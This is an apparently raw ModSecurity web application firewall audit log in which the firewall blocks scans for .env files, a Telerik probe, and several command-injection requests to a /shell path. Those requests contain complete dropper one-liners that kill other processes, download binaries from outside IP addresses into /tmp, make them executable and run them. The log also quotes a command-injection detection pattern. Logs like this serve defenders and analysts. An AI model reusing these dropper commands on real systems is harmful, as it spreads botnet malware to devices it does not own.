Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3002267e-Z-- --5700b47f-A-- [06/May/2025:15:45:10 +0700] aBnMFjhugRYtrdwuyww65wAAAJU 103.236.140.4 49924 103.236.140.4 8181 --5700b47f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5700b47f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5700b47f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746521110951220 618 (- - -) Stopwatch2: 1746521110951220 618; combined=298, p1=272, p2=0, p3=0, p4=0, p5=26, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5700b47f-Z-- --895d0702-A-- [06/May/2025:15:45:18 +0700] aBnMHkfy6a2jfN9asT7D_gAAAAo 103.236.140.4 49950 103.236.140.4 8181 --895d0702-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --895d0702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --895d0702-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746521118694796 819 (- - -) Stopwatch2: 1746521118694796 819; combined=331, p1=297, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --895d0702-Z-- --f4375224-A-- [06/May/2025:16:12:31 +0700] aBnSfzhugRYtrdwuyww7EQAAAIk 103.236.140.4 50154 103.236.140.4 8181 --f4375224-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.158.12.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.158.12.5 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f4375224-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4375224-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746522751448407 913 (- - -) Stopwatch2: 1746522751448407 913; combined=414, p1=357, p2=0, p3=0, p4=0, p5=57, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4375224-Z-- --209dac7a-A-- [06/May/2025:16:12:32 +0700] aBnSgDhugRYtrdwuyww7EwAAAJQ 103.236.140.4 50158 103.236.140.4 8181 --209dac7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.158.12.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.158.12.5 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --209dac7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --209dac7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746522752387293 689 (- - -) Stopwatch2: 1746522752387293 689; combined=257, p1=226, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209dac7a-Z-- --74f1d92b-A-- [06/May/2025:16:50:12 +0700] aBnbVHQ-FFoo6luwbxLvQQAAAMM 103.236.140.4 50754 103.236.140.4 8181 --74f1d92b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --74f1d92b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74f1d92b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746525012622731 1078 (- - -) Stopwatch2: 1746525012622731 1078; combined=395, p1=354, p2=0, p3=0, p4=0, p5=41, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74f1d92b-Z-- --c98c1f20-A-- [06/May/2025:16:50:15 +0700] aBnbV75Kt25brCRGiyhnSwAAABQ 103.236.140.4 50758 103.236.140.4 8181 --c98c1f20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c98c1f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c98c1f20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746525015019014 694 (- - -) Stopwatch2: 1746525015019014 694; combined=286, p1=253, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c98c1f20-Z-- --2a7d9f61-A-- [06/May/2025:16:51:00 +0700] aBnbhL5Kt25brCRGiyhnVAAAAAg 103.236.140.4 50782 103.236.140.4 8181 --2a7d9f61-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.156.130.43 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.156.130.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --2a7d9f61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a7d9f61-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746525060262797 2093 (- - -) Stopwatch2: 1746525060262797 2093; combined=989, p1=326, p2=629, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a7d9f61-Z-- --c8a08064-A-- [06/May/2025:16:53:06 +0700] aBncAlodKr7jV1iEMs8S8AAAAJI 103.236.140.4 51706 103.236.140.4 8181 --c8a08064-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 164.90.208.56 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 164.90.208.56 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c8a08064-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8a08064-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746525186377611 737 (- - -) Stopwatch2: 1746525186377611 737; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8a08064-Z-- --fb149e63-A-- [06/May/2025:17:35:49 +0700] aBnmBb5Kt25brCRGiyhpBAAAAAs 103.236.140.4 52262 103.236.140.4 8181 --fb149e63-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fb149e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb149e63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746527749342779 917 (- - -) Stopwatch2: 1746527749342779 917; combined=403, p1=367, p2=0, p3=0, p4=0, p5=36, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb149e63-Z-- --ec41c717-A-- [06/May/2025:17:51:39 +0700] aBnpu75Kt25brCRGiyhpHAAAAAU 103.236.140.4 52414 103.236.140.4 8181 --ec41c717-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1 Accept-Charset: utf-8 --ec41c717-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec41c717-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746528699270925 838 (- - -) Stopwatch2: 1746528699270925 838; combined=345, p1=304, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec41c717-Z-- --cee61c32-A-- [06/May/2025:18:05:52 +0700] aBntEHQ-FFoo6luwbxLvjQAAAMg 103.236.140.4 52594 103.236.140.4 8181 --cee61c32-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 209.97.180.8 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cee61c32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cee61c32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746529552507076 880 (- - -) Stopwatch2: 1746529552507076 880; combined=380, p1=345, p2=0, p3=0, p4=0, p5=35, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee61c32-Z-- --0840bf67-A-- [06/May/2025:18:26:35 +0700] aBnx61odKr7jV1iEMs8TaQAAAIg 103.236.140.4 52814 103.236.140.4 8181 --0840bf67-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --0840bf67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0840bf67-E-- --0840bf67-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746530795458784 2737 (- - -) Stopwatch2: 1746530795458784 2737; combined=826, p1=493, p2=295, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0840bf67-Z-- --ec3dff04-A-- [06/May/2025:19:34:18 +0700] aBoBynQ-FFoo6luwbxLzHgAAAMA 103.236.140.4 32958 103.236.140.4 8181 --ec3dff04-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --ec3dff04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec3dff04-E-- --ec3dff04-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746534858504125 14542 (- - -) Stopwatch2: 1746534858504125 14542; combined=24878, p1=492, p2=268, p3=0, p4=0, p5=12074, sr=81, sw=0, l=0, gc=12044 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec3dff04-Z-- --71a0286c-A-- [06/May/2025:19:44:03 +0700] aBoEE1odKr7jV1iEMs8VIgAAAIk 103.236.140.4 33028 103.236.140.4 8181 --71a0286c-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --71a0286c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71a0286c-E-- --71a0286c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746535443509607 2501 (- - -) Stopwatch2: 1746535443509607 2501; combined=763, p1=478, p2=252, p3=0, p4=0, p5=32, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71a0286c-Z-- --80a52431-A-- [06/May/2025:19:49:52 +0700] aBoFcFodKr7jV1iEMs8VIwAAAIo 103.236.140.4 33042 103.236.140.4 8181 --80a52431-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --80a52431-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80a52431-E-- --80a52431-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.x86;chmod 777 g4za.x86;./g4za.x86 jawsgr;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/italianbrainrot/g4za.arm7;chmod 777 g4za.arm7;./g4za.arm7 jawsgr: cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.x86 chmod 777 g4za.x86 ./g4za.x86 jawsgr cd/tmp rm -rf j nohup wget http://94.26.90.251/italianbrainrot/g4za.arm7 chmod 777 g4za.arm7 ./g4za.arm7 jawsgr"] [severity Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746535792981402 2446 (- - -) Stopwatch2: 1746535792981402 2446; combined=826, p1=470, p2=324, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80a52431-Z-- --3399eb6b-A-- [06/May/2025:20:03:05 +0700] aBoIib8Q_AFo5EvzOKvbIwAAAEU 103.236.140.4 35308 103.236.140.4 8181 --3399eb6b-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsgr;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsgr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.142 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --3399eb6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3399eb6b-E-- --3399eb6b-H-- Message: Access denied with code 403 (phase 2). 